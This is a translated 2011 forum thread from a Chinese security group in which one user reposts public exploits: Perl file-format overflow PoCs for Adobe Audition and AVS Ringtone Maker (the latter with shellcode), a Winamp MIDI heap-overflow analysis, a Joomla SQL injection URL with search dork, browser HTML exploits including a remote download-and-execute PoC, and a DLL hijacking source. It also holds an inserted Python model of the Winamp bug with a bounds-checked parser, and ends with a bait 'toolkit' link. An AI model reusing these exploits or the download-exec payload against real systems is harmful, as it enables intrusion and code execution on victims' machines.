Forum: Newbie Paradise    Title: Exploit special!
Author: DarK-Z [bridex]    Forum user
Source code!



[This post was edited by DarK-Z(bridex) on May 19 at 20:51]

Original poster    Posted: 11-05-19 20:11

Reply: DarK-Z [bridex]    Forum user

Friends with good English should study these!


[This post was edited by DarK-Z(bridex) on May 20 at 11:00]

Floor 1    Posted: 11-05-19 20:23

Reply: DarK-Z [bridex]    Forum user
These are from 2011.
Adobe Audition 3.0 (build 7283) Session File Handling
With source code too

SEBUG-ID:20546
Published: 2011-05-12
Test method:
[www.sebug.net]
Programs (methods) provided by this site may be offensive in nature; they are for security research and teaching only, use at your own risk!
#!/usr/bin/perl
#
#
# Adobe Audition 3.0 (build 7283) Session File Handling Buffer Overflow PoC
#
#
# Vendor: Adobe Systems Inc.
# Product web page: http://www.adobe.com/products/audition/
# Affected version: 3.0 (build 7238)
#
# Summary: Recording, mixing, editing, and mastering — Adobe® Audition® 3 software is the
# all-in-one toolset for professional audio production.
#
# Desc: Adobe Audition suffers from a buffer overflow vulnerability when dealing with .SES
# (session) format file. The application failz to sanitize the user input resulting in a
# memory corruption, overwriting several memory registers which can aid the attacker to gain
# the power of executing arbitrary code or denial of service.
#
# Tested on Microsoft Windows XP Professional SP3 (English)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# liquidworm gmail com
# Zero Science Lab - http://www.zeroscience.mk
#
#
# http://img225.imageshack.us/img225/9871/boferror.jpg
#
#
# Zero Science Lab Advisory ID: ZSL-2011-5012
# Zero Science Lab Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5012.php
#
# Adobe Advisory ID: APSB11-10
# Adobe Advisory URL: http://www.adobe.com/support/security/bulletins/apsb11-10.html
#
# CVE ID: CVE-2011-0614
#
#
# 18.09.2009
#


$data = "\x43\x4F\x4F\x4C\x4E\x45\x53\x53\x50\xF2\x08\x00".   # "COOLNESS" file magic + header bytes
    "\x68\x64\x72\x20\xF0\x03\x00\x00\x22\x56\x00\x00".       # "hdr " chunk
    "\xFC\x17\x0A\x00\x00\x00\x00\x00\x20\x00\x01\x00".
    "\x00\x00\x00\x00\x00\x00\xF0\x3F\x00\x00\x00\x00".
    "\x00\x00\xF0\x3F".
    ("\x41" x 900).                                           # 900 'A' bytes, as written out byte by byte in the original listing
    "\x00";


$FNAME = "Assassin.ses";

print "\n\n[*] Creating malicious session file: $FNAME ...\r\n";

open(ses, ">./$FNAME") || die "\n\aCannot open $FNAME: $!";
binmode(ses);   # write the bytes exactly as given (no newline translation on Windows)

print ses $data;
sleep(1);

close (ses);

print "\n[*] Malicious session file successfully crafted!\r\n\n";

# sebug.net [2011-05-13]


Floor 2    Posted: 11-05-19 20:27

Reply: DarK-Z [bridex]    Forum user
AVS Ringtone Maker 1.6.1 - SEH Overflow Exploit

Floor 3    Posted: 11-05-19 20:34

Reply: DarK-Z [bridex]    Forum user
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0    _                  __          __      __                    1
1  /' \            __  /'__`\        /\ \__  /'__`\                  0
0  /\_, \    ___  /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___          1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0    \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/          1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\          0
0      \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/          1
1                  \ \____/ >> Exploit database separated by exploit  0
0                  \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                  0
1  [+] Support e-mail  : submit[at]1337day.com                        1
0                                                                      0
1              #########################################              1
0              I'm KedAns-Dz member from Inj3ct0r Team                1
1              #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

#!/usr/bin/perl
system("cls");
sub logo(){
print q'
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
1                      ______                                          0
0                  .-"      "-.                                      1
1                  / KedAns-Dz  \ =-=-=-=-=-=-=-=-=-=-=-|              0
0 Algerian HaCker |              | > Site : 1337day.com |              1
1 --------------- |,  .-.  .-.  ,| > Twitter : @kedans  |              0
0                | )(_o/  \o_)( | > ked-h@hotmail.com  |              1
1                |/    /\    \| =-=-=-=-=-=-=-=-=-=-=|              0
0      (@_      (_    ^^    _)  HaCkerS-StreeT-Team                1
1  _    ) \_______\__|IIIIII|__/_______________________              0
0 (_)@8@8{}<________|-\IIIIII/-|________________________>              1
1        )_/        \          /                                      0
0      (@          `--------` &copy; 2011, Inj3ct0r Team                  1
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0
0      AVS Ringtone Maker 1.6.1 - SEH Overflow Exploit                1
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0
';
}
logo();
###
# Title : AVS Ringtone Maker 1.6.1 - SEH Overflow Exploit
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com | ked-h@exploit-id.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Web Site : www.1337day.com * www.exploit-id.com * www.09exploit.com
# Twitter page : twitter.com/kedans
# platform : windows
# Tested on : Windows XP sp3 FR
##
# Drag And Drop This File to edit Window & Start Upload >> Bo0M CalC !
###

my $junk = "\x41" x 4123 ; # Buffer Junk
my $jump = "\xeb\x06\x90\x90"; #  Short Jump
my $eip = pack("V", 0x00401E3C); # EIP
my $seh = pack("V", 0x7C839AC0); # SEH

# windows/exec - 511 bytes ( http://www.metasploit.com)
# Encoder: x86/alpha_mixed
# EXITFUNC=seh, CMD=calc.exe
my $shellcode = "\xe8\x52\xe6\xff\xff\x90\x90".
"\x56\x54\x58\x36\x33\x30\x56\x58\x48\x34\x39\x48\x48\x48" .
"\x50\x68\x59\x41\x41\x51\x68\x5a\x59\x59\x59\x59\x41\x41" .
"\x51\x51\x44\x44\x44\x64\x33\x36\x46\x46\x46\x46\x54\x58" .
"\x56\x6a\x30\x50\x50\x54\x55\x50\x50\x61\x33\x30\x31\x30" .
"\x38\x39\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41" .
"\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42" .
"\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x49" .
"\x78\x4d\x59\x47\x70\x43\x30\x43\x30\x43\x50\x4e\x69\x49" .
"\x75\x46\x51\x4b\x62\x42\x44\x4e\x6b\x46\x32\x46\x50\x4c" .
"\x4b\x43\x62\x44\x4c\x4c\x4b\x42\x72\x47\x64\x4e\x6b\x51" .
"\x62\x51\x38\x44\x4f\x4e\x57\x43\x7a\x44\x66\x44\x71\x4b" .
"\x4f\x45\x61\x49\x50\x4c\x6c\x45\x6c\x43\x51\x51\x6c\x46" .
"\x62\x44\x6c\x51\x30\x49\x51\x48\x4f\x44\x4d\x47\x71\x49" .
"\x57\x4a\x42\x4c\x30\x42\x72\x50\x57\x4c\x4b\x51\x42\x44" .
"\x50\x4c\x4b\x51\x52\x45\x6c\x46\x61\x4e\x30\x4c\x4b\x47" .
"\x30\x50\x78\x4d\x55\x49\x50\x42\x54\x43\x7a\x43\x31\x4a" .
"\x70\x42\x70\x4c\x4b\x51\x58\x44\x58\x4e\x6b\x50\x58\x45" .
"\x70\x46\x61\x4e\x33\x48\x63\x45\x6c\x50\x49\x4c\x4b\x44" .
"\x74\x4c\x4b\x46\x61\x49\x46\x46\x51\x4b\x4f\x44\x71\x4f" .
"\x30\x4e\x4c\x49\x51\x48\x4f\x44\x4d\x43\x31\x48\x47\x45" .
"\x68\x49\x70\x42\x55\x49\x64\x43\x33\x51\x6d\x49\x68\x47" .
"\x4b\x43\x4d\x47\x54\x51\x65\x4a\x42\x51\x48\x4c\x4b\x42" .
"\x78\x51\x34\x47\x71\x4b\x63\x50\x66\x4c\x4b\x44\x4c\x50" .
"\x4b\x4c\x4b\x50\x58\x47\x6c\x43\x31\x4a\x73\x4c\x4b\x43" .
"\x34\x4e\x6b\x45\x51\x4a\x70\x4b\x39\x47\x34\x51\x34\x44" .
"\x64\x51\x4b\x43\x6b\x43\x51\x46\x39\x50\x5a\x42\x71\x4b" .
"\x4f\x4b\x50\x51\x48\x43\x6f\x42\x7a\x4e\x6b\x45\x42\x4a" .
"\x4b\x4f\x76\x51\x4d\x50\x6a\x46\x61\x4c\x4d\x4f\x75\x48" .
"\x39\x43\x30\x43\x30\x45\x50\x42\x70\x50\x68\x46\x51\x4e" .
"\x6b\x42\x4f\x4e\x67\x49\x6f\x4a\x75\x4d\x6b\x49\x6e\x44" .
"\x4e\x46\x52\x4a\x4a\x51\x78\x4e\x46\x4a\x35\x4d\x6d\x4f" .
"\x6d\x49\x6f\x4a\x75\x45\x6c\x46\x66\x51\x6c\x44\x4a\x4f" .
"\x70\x49\x6b\x49\x70\x42\x55\x46\x65\x4f\x4b\x50\x47\x45" .
"\x43\x51\x62\x42\x4f\x43\x5a\x43\x30\x42\x73\x49\x6f\x4e" .
"\x35\x42\x43\x45\x31\x50\x6c\x51\x73\x44\x6e\x43\x55\x51" .
"\x68\x50\x65\x47\x70\x41\x41";
my $exploit = $junk.$jump.$eip.$seh.$shellcode;
open (FILE, '> KedAns.wav') or die "Cannot open KedAns.wav: $!";
binmode(FILE);   # raw bytes, no newline translation on Windows
print FILE $exploit;
close(FILE);

#================[ Exploited By KedAns-Dz * HST-Dz * ]=========================================== 
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * ZoRLu
# gunslinger_ * Sn!pEr.S!Te * anT!-Tr0J4n * ^Xecuti0N3r 'www.1337day.com/team' ++ ....
# Exploit-Id Team : jos_ali_joe + Caddy-Dz + kaMtiEz (exploit-id.com) ...All * TreX (hotturks.org)
# (sec4ever.com) * CEO (0nto.me) * PaCketStorm Team (www.packetstormsecurity.org)
# www.metasploit.com * UE-Team (www.09exploit.com) * All Security and Exploits Webs ...
#================================================================================================

Whoa, that picture is a bit scary!

Floor 4    Posted: 11-05-19 20:35

Reply: DarK-Z [bridex]    Forum user
Winamp 5.61 'in_midi' component heap overflow

Floor 5    Posted: 11-05-19 20:37

Reply: DarK-Z [bridex]    Forum user
# Exploit Title: Winamp 'in_midi' component heap overflow
# Date: 05/14/2011
# Author: Alexander Gavrun (http://0x1byte.blogspot.com/)
# Software Link: http://www.winamp.com/
# Version: 5.61
# Tested on: Windows 7
 
The vulnerability occurs while parsing a MIDI file with a specially crafted System Exclusive message type (event).

The System Exclusive message type, according to the MIDI specification (http://www.gweep.net/~prefect/eng/reference/protocol/midispec.html), begins with 0xF0 and ends with a 0xF7 byte (after the data bytes). Processing of this message type begins in the sub_766410F function (disassembled in_midi.dll of Winamp v.5.61).
 
; .....
.text:0766414D loc_766414D:                            ; CODE XREF: sub_766410F+36 j
.text:0766414D                add    ebx, eax
.text:0766414F                lea    esi, [ebx+edi]
.text:07664152                mov    al, [esi]  ; esi points to message begin
.text:07664154                mov    [ebp+var_C], ebx
.text:07664157                cmp    al, 0FFh  ; is first byte equal to 0xFF?
.text:07664159                jnz    loc_7664328
; .....
 
.text:07664328 loc_7664328:                            ; CODE XREF: sub_766410F+4A j
.text:07664328                mov    edx, 0F0h
.text:0766432D                mov    cl, al
.text:0766432F                and    cl, dl
.text:07664331                cmp    cl, dl
.text:07664333                jnz    short loc_7664398 
.text:07664335                cmp    al, dl
.text:07664337                jnz    short loc_766438E ; is first byte equal 0xF0 (is SysEx message type?)?
.text:07664339                mov    eax, [ebp+arg_8]
.text:0766433C                mov    edi, [ebp+var_8]
.text:0766433F                sub    eax, ebx
.text:07664341                push    eax
.text:07664342                mov    ecx, esi
.text:07664344                mov    [ebp+var_10], edi
.text:07664347                call    sub_766D702
.text:0766434C                pop    ecx
.text:0766434D                mov    ecx, [ebp+arg_10]
.text:07664350                add    edi, ecx
.text:07664352                push    edi
.text:07664353                push    eax ; SysEx message size, calculated by sub_766D702
.text:07664354                push    esi
.text:07664355                mov    esi, [ebp+arg_0]
.text:07664358                mov    edi, [esi+30h]
.text:0766435B                mov    [ebp+var_24], eax
.text:0766435E                call    sub_766D894
 
The sub_766D702 function searches for the 0xF7 byte and counts the size of the SysEx message. Searching starts from the 3rd byte, which means that the minimal value the function might return is 3.
 
; .....
.text:0766D702 sub_766D702    proc near   
 
.text:0766D702                push    ebp
.text:0766D703                mov    ebp, esp
.text:0766D705                xor    eax, eax
.text:0766D707                inc    eax    ; eax = 1
.text:0766D708                cmp    [ebp+arg_0], eax ; arg_0 - MTrk chunk size (read from midi file)
.text:0766D70B                jle    short loc_766D719 ; jump is not taken
.text:0766D70D
.text:0766D70D loc_766D70D:                            ; CODE XREF: sub_766D702+15 j
.text:0766D70D                inc    eax    ; eax = 2
.text:0766D70E                cmp    byte ptr [eax+ecx], 0F7h ; check for 0xF7 byte
.text:0766D712                jz      short loc_766D731
.text:0766D714                cmp    eax, [ebp+arg_0]
.text:0766D717                jl      short loc_766D70D
; .....
.text:0766D731 loc_766D731:                            ; CODE XREF: sub_766D702+10 j
.text:0766D731                inc    eax ; eax = 3 (minimal value that this function might return)
.text:0766D732                pop    ebp
.text:0766D733                retn
; .....
 
sub_766D894 checks the size of the earlier allocated buffer and reallocates it if necessary. Then the data of the SysEx message is copied into this buffer, with the size obtained by subtracting the offset (to the data begin) from the SysEx message size.
 
.text:0766D894 sub_766D894    proc near              ; CODE XREF: sub_766410F+24F p
.text:0766D894
; .....
.text:0766D8DC loc_766D8DC:                            ; CODE XREF: sub_766D894+29 j
.text:0766D8DC                mov    eax, [edi]
.text:0766D8DE                push    ebx
.text:0766D8DF                mov    ebx, [edi+14h]
.text:0766D8E2                add    ebx, [ebp+arg_4]
.text:0766D8E5                cmp    ebx, eax  ; ebx - SysEx message size, eax - allocated earlier buffer size
.text:0766D8E7                jb      short loc_766D900  ; jump is taken (to trigger vuln. SysEx message size must be small).
; .....
.text:0766D900 loc_766D900:                            ; CODE XREF: sub_766D894+53 j
.text:0766D900                mov    eax, [edi+14h]
.text:0766D903                mov    ecx, [edi+0Ch]
.text:0766D906                mov    byte ptr [eax+ecx], 0F0h
.text:0766D90A                mov    eax, [ebp+arg_0]
.text:0766D90D                inc    eax
.text:0766D90E                push    0FFFFFFFFh
.text:0766D910                push    eax  ; eax - pointer to start of SysEx message plus one
.text:0766D911                lea    esi, [ebp+var_4]
.text:0766D914                call    sub_766D734
; .....
 
The sub_766D734 function calculates the offset to the data begin by skipping all negative bytes that follow the first byte (0xF0).
 
.text:0766D734 sub_766D734    proc near             
; .....
.text:0766D734                xor    eax, eax
.text:0766D736                xor    ecx, ecx
.text:0766D738                push    edi
.text:0766D739
.text:0766D739 loc_766D739:                            ; CODE XREF: sub_766D734+20 j
.text:0766D739                cmp    eax, [esp+4+arg_4] ; arg_4 = 0xFFFFFFFF, eax = 0
.text:0766D73D                jnb    short loc_766D75A ; jump is not taken
.text:0766D73F                mov    edx, [esp+4+arg_0]
.text:0766D743                mov    dl, [eax+edx]  ; store byte to dl
.text:0766D746                movzx  edi, dl
.text:0766D749                and    edi, 7Fh
.text:0766D74C                shl    ecx, 7
.text:0766D74F                inc    eax  ; counter
.text:0766D750                or      ecx, edi
.text:0766D752                test    dl, dl
.text:0766D754                js      short loc_766D739 ; is the stored byte less than zero?
.text:0766D756                mov    [esi], ecx
.text:0766D758                pop    edi
.text:0766D759                retn
.text:0766D75A ; ---------------------------------------------------------------------------
.text:0766D75A
.text:0766D75A loc_766D75A:                            ; CODE XREF: sub_766D734+9 j
.text:0766D75A                and    dword ptr [esi], 0
.text:0766D75D                pop    edi
.text:0766D75E                retn
.text:0766D75E sub_766D734    endp
 
Then the value, obtained as [SysEx message size] - [offset to data begin] - 1, is passed as the Size argument to the memcpy function.
 
; .....
.text:0766D919                mov    esi, [ebp+arg_4]
.text:0766D91C                sub    esi, eax
.text:0766D91E                lea    ecx, [esi-1]  ; ecx = size - offset - 1
.text:0766D921                push    ecx            ; Size
.text:0766D922                mov    ecx, [ebp+arg_0]
.text:0766D925                mov    [ebp+var_4], eax
.text:0766D928                lea    eax, [eax+ecx+1]
.text:0766D92C                mov    ecx, [edi+0Ch]
.text:0766D92F                push    eax            ; Src
.text:0766D930                mov    eax, [edi+14h]
.text:0766D933                lea    eax, [eax+ecx+1]
.text:0766D937                push    eax            ; Dst
.text:0766D938                call    memcpy
 
Since 0xF7 is less than zero, we can construct a SysEx message so that the offset will be greater than (or equal to) the size.
For example, the following sequence

0xF0 0xFF 0xF7 0xFF 0xFF ...[data]
size = 3 and offset = 4
ecx = 3 - 4 - 1 = 0xFFFFFFFE, a very big positive value. After that, a heap overflow will occur.
 
 
POC file (MIME encoded):
 
POC Available: http://www.exploit-db.com/sploits/17287.poc.mid


Floor 6    Posted: 11-05-19 20:42
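A constructed model of the in_midi SysEx length arithmetic analysed in the post above, beside a bounds-checked parser. This is an added example, not Winamp's code: the function names are mine, the helpers only mirror what the write-up says sub_766D702, sub_766D734 and the memcpy size computation do, and the sample events are constructed.

```python
# Constructed model of the in_midi SysEx length handling described in the
# write-up, plus a bounds-checked parser. Not Winamp's code: function names
# are mine and the sample events below are made up for the demonstration.

MASK32 = 0xFFFFFFFF


def sysex_size(buf: bytes, start: int, chunk_len: int) -> int:
    """Mirror of sub_766D702: scan for the 0xF7 terminator beginning at the
    3rd byte of the message and return the byte count through it (never
    less than 3). The terminator is matched wherever it appears, even
    inside the length field that follows 0xF0, which is the root cause."""
    i = 1
    while i < chunk_len:
        i += 1
        if start + i < len(buf) and buf[start + i] == 0xF7:
            return i + 1
    # The post elides the no-terminator path; treat it as a parse error.
    raise ValueError("SysEx message has no 0xF7 terminator")


def vlq_offset(buf: bytes, pos: int) -> tuple[int, int]:
    """Mirror of sub_766D734: read a variable-length quantity at buf[pos:],
    consuming bytes while bit 7 (the sign bit) is set. The original is
    called with a 0xFFFFFFFF limit, i.e. effectively unbounded; len(buf)
    bounds it here. Returns (bytes consumed, decoded value)."""
    consumed, value = 0, 0
    while pos + consumed < len(buf):
        b = buf[pos + consumed]
        value = ((value << 7) | (b & 0x7F)) & MASK32
        consumed += 1
        if not (b & 0x80):
            return consumed, value
    return consumed, 0  # hit the limit: the original stores 0 (assumed)


def vulnerable_copy_len(buf: bytes, start: int, chunk_len: int) -> int:
    """The memcpy Size the post derives: size - offset - 1, as the 32-bit
    unsigned value the CPU sees. Wraps to a huge count when offset + 1 >= size."""
    size = sysex_size(buf, start, chunk_len)
    offset, _ = vlq_offset(buf, start + 1)
    return (size - offset - 1) & MASK32


def safe_sysex_payload(buf: bytes, start: int, end: int) -> bytes:
    """Bounds-checked alternative: F0 <VLQ length> <data...> F7, where the
    VLQ counts the bytes after it, terminator included (the SMF convention).
    Every read and the final copy stay inside buf[start:end]."""
    if start >= end or buf[start] != 0xF0:
        raise ValueError("not a SysEx event")
    pos, length = start + 1, 0
    for _ in range(4):  # an SMF variable-length quantity is at most 4 bytes
        if pos >= end:
            raise ValueError("truncated length field")
        b = buf[pos]
        length = (length << 7) | (b & 0x7F)
        pos += 1
        if not (b & 0x80):
            break
    else:
        raise ValueError("length field longer than 4 bytes")
    if length == 0 or pos + length > end:
        raise ValueError("declared length runs past the end of the chunk")
    if buf[pos + length - 1] != 0xF7:
        raise ValueError("SysEx not terminated by 0xF7")
    return bytes(buf[pos:pos + length - 1])


def is_rejected(buf: bytes) -> bool:
    """True when the checked parser refuses the event."""
    try:
        safe_sysex_payload(buf, 0, len(buf))
        return False
    except ValueError:
        return True


# Constructed sample events (not taken from the post's poc.mid).
# Length field FF F7 FF 55 keeps bit 7 set for three bytes, so the scanner's
# 0xF7 match at index 2 gives size = 3 while the VLQ consumes 4 bytes.
BAD_SYSEX = bytes([0xF0, 0xFF, 0xF7, 0xFF, 0x55]) + b"\x55" * 8
# A well-formed event: F0, length 4, three data bytes, F7.
GOOD_SYSEX = bytes([0xF0, 0x04, 0x41, 0x42, 0x43, 0xF7])

if __name__ == "__main__":
    for name, ev in (("BAD", BAD_SYSEX), ("GOOD", GOOD_SYSEX)):
        print(f"{name}: size={sysex_size(ev, 0, len(ev))} "
              f"offset={vlq_offset(ev, 1)[0]} "
              f"memcpy_size=0x{vulnerable_copy_len(ev, 0, len(ev)):08X} "
              f"rejected={is_rejected(ev)}")
```

Run stand-alone it prints the size/offset pair for both events; the bad one yields a memcpy size of 0xFFFFFFFE from the unsigned wrap, and the checked parser refuses it before any copy.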

Reply: DarK-Z [bridex]    Forum user
SQL again
Joomla Component com_versioning SQLi Vulnerability

Floor 7    Posted: 11-05-19 20:43

Reply: DarK-Z [bridex]    Forum user
SEBUG-ID:20527
SEBUG-Appdir:Joomla
Published: 2011-05-09
Test method:
[www.sebug.net]
Programs (methods) provided by this site may be offensive in nature; they are for security research and teaching only, use at your own risk!
#[~] Author : the_cyber_nuxbie
#[~] Home  : www.thecybernuxbie.com
#[~] E-mail : staff@thecybernuxbie.com
#[~] Found  : 09 May 2011.
#[~] Tested : Windows 7 Ultimate 32bit (pirated copy).
#[!] Dork  : inurl:"com_versioning"
______________________________________________________________

[x] X.P.L:
../public_html/index.php?option=com_versioning&sectionid=0&+task=edit&id=[SQLi] <--- Your Skill...!!!

- Shout & Greetz:
All Member & Staff SekuritiOnline    | www.sekuritionline.net
All Member & Staff YogyaFamilyCode  | www.xcode.or.id
All Member & Staff Devilzc0de        | www.devilzc0de.org
All Member & Staff Hacker-Newbie    | www.hacker-newbie.org
All Member & Staff ECHO              | www.echo.or.id
All Member & Staff WhiteCyber        | www.whitecyber.net
All Member & Staff MuslemHacker      | www.muslimhackers.net
All Member & Staff BinusHacker      | www.binushacker.net
All Member & Staff Jasakom          | www.jasakom.com
All Member & Staff YogyaCarderLink.  | www.yogyacarderlink.web.id
All Member & Staff IndonesianDefacer | www.indonesiandefacer.org
All Member & Staff IndonesianCoder  | www.indonesiancoder.com
All Member & Staff MagelangCyber    | www.magelangcyber.web.id
All Member & Staff Jatim-Crew        | www.jatimcrew.org
All Member & Staff Fast-Hacker      | www.fasthacker.org
And all cyber forums / communities across Indonesia. :-D
,etc...

Sorry bro...
I'm still a newbie... :-D
Please don't insult me... :-(
Bwahahahahaha... :-D

- May 09 2011, GMT +09:35 Solo Raya, Indonesia.
// sebug.net [2011-05-10]


Floor 8    Posted: 11-05-19 20:46

Reply: DarK-Z [bridex]    Forum user
(Firefox & Safari & IE) + QuickTime res://mshtml.dll

Floor 9    Posted: 11-05-19 20:48

Reply: DarK-Z [bridex]    Forum user

<!--
###
# Title : (Firefox & Safari & IE) + QuickTime res://mshtml.dll/ Remote Exploits
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com | ked-h@exploit-id.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Web Site : www.1337day.com * www.exploit-id.com * www.09exploit.com
# Twitter page : twitter.com/kedans
# platform : Windows
# Impact : Remote { Buffer Overflow + Download/Exec File (Tr0j4n3) }
# Tested on : Windows XP SP3 Fr (Firefox 4.0 + Safari 4.0.5 & IE7) << QuickTime v7.5.5
###
# (~) Greetings To : Caddy-Dz (+) JaGo-Dz (+) Dr.Ride (+) All My Friends
###
-->

#=======[ PoC (1) Buffer Overflow & Crash !]============>

<html><head>
<script src="res://mshtml.dll/objectembed.js"></script>
<script language="javascript">
function boom()
{
var longunistring1 = unescape("%u4141%u4141");
var longunistring2 = unescape("%u4242%u4242");
var longunistring3 = unescape("%u4343%u4343");
var longunistring4 = unescape("%u4444%u4444");
for(i=0; i <= 999 ; ++i)
{
longunistring1+=longunistring1;
longunistring2+=longunistring2;
longunistring3+=longunistring3;
longunistring4+=longunistring4;
document.write(longunistring1);
document.write(longunistring2);
document.write(longunistring3);
document.write(longunistring4);
}   
document.write(longunistring1);
document.write(longunistring2);
document.write(longunistring3);
document.write(longunistring4);
document.write(document.body.innerHTML);
}
var objectSource = boom();
</script>
</head>
<body onload="ObjectLoad();" leftmargin="0" topmargin="0" scroll="no">
<form id="objectDestination"></form></body>
</html>

#=======[ PoC (2) Download/Exec File]============>

<html><head>
<script src="res://mshtml.dll/objectembed.js"></script>
<script language="javascript">
var objectSource = "http://[HOST]/{file}.exe.gif";
</script>
</head>
<body onload="ObjectLoad();" leftmargin="0" topmargin="0" scroll="no">
<form id="objectDestination"></form></body>
</html>

# Save as any HTML file and use it (Boom !! :D)
<!--
#================[ Exploited By KedAns-Dz * HST-Dz * ]=========================================== 
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * agix *
# gunslinger_ * Sn!pEr.S!Te * ZoRLu * anT!-Tr0J4n * ^Xecuti0N3r 'www.1337day.com/team' ++ ....
# Exploit-Id Team : jos_ali_joe + Caddy-Dz (exploit-id.com) ... All Others * TreX (hotturks.org)
# JaGo-Dz (sec4ever.com) * CEO (0nto.me) * PaCketStorm Team (www.packetstormsecurity.org)
# www.metasploit.com * UE-Team (www.09exploit.com) * All Security and Exploits Webs ...
#================================================================================================
-->


Floor 10    Posted: 11-05-19 20:49

Reply: DarK-Z [bridex]    Forum user
SEBUG-ID:20523
Published: 2011-05-06
Test method:
[www.sebug.net]
Programs (methods) provided by this site may be offensive in nature; they are for security research and teaching only, use at your own risk!
# Exploit Title: phpThumb 'phpThumbDebug' Information Disclosure
# Google Dork: inurl:phpThumb.php
# Date: 06/05/2011
# Author: mook
# Software Link: http://phpthumb.sourceforge.net/#download
# Version: 1.7.9
# Tested on: linux

Vulnerability:

Information disclosure which includes absolute system paths, os
flavour, application configuration information and other installed
application versions.

The vulnerability can be triggered by appending 'phpThumbDebug=' and
any number from 0 to 10 to any phpThumb.php request, e.g.:



The response will be an image render of the debug information.

Remediation:

The responsible code can be found in phpThumb.php itself; fix it by changing
the default "$PHPTHUMB_CONFIG['disable_debug'] = false;" to
"$PHPTHUMB_CONFIG['disable_debug'] = true;".
// sebug.net [2011-05-08]


Floor 11    Posted: 11-05-19 20:50

Reply: DarK-Z [bridex]    Forum user
BlueFTP 1.2 DLL Hijacking Exploit (ProfUIS250m.dll)

Floor 12    Posted: 11-05-19 20:51

Reply: DarK-Z [bridex]    Forum user

# ======[ Exploit DLL C0de ====>

/*
###
# Title : BlueFTP 1.2 DLL Hijacking Exploit (ProfUIS250m.dll)
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com | ked-h@exploit-id.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Web Site : www.1337day.com / exploit-id.com
# Twitter page : twitter.com/kedans
# platform : Windows
# Target : BlueFTP 1.2
# Tested on : Windows XP sp3 France
###
1. Compile dll
2. Replace 'BlueFTP 1.2' in 'BlueVoda Website Builder' directory with your newly compiled dll
3. Reboot or Startup BlueFTP
4. Boom calc!
###
*/

#include <windows.h>
#include <stdlib.h>   /* exit() */
#define DllExport __declspec (dllexport)

int Viva_Juventus(void);   /* prototype: the function is called before it is defined */

DllExport void hook_startup() { Viva_Juventus(); }

int Viva_Juventus(void)
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}

/*
#================[ Exploited By KedAns-Dz * HST-Dz * ]=========================================== 

# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * agix *
# gunslinger_ * Sn!pEr.S!Te * ZoRLu * anT!-Tr0J4n 'www.1337day.com/team' ++ ....
# Exploit-Id Team : jos_ali_joe + kaMtiEz (exploit-id.com) ... All Others * TreX (hotturks.org)
# JaGo-Dz (sec4ever.com) * KelvinX (kelvinx.net) * PaCketStorm Team (www.packetstormsecurity.org)
# www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ...
#================================================================================================
*/

Floor 13    Posted: 11-05-19 20:52

Reply: DarK-Z [bridex]    Forum user
EXPLOIT toolkit, multi-function
http://auction1.paipai.com/14E8366C0000000000143AF40797F580

Everyone click it, the coolest overflow toolkit!



[This post was edited by DarK-Z(bridex) on May 19 at 20:59]

Floor 14    Posted: 11-05-19 20:56

Reply: DarK-Z [bridex]    Forum user
Heh, you've been had~

Floor 15    Posted: 11-05-20 11:01


Copyright 20CN Network Security Group
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
Forum software by: NetDemon

Guangdong ICP licence no. 05087286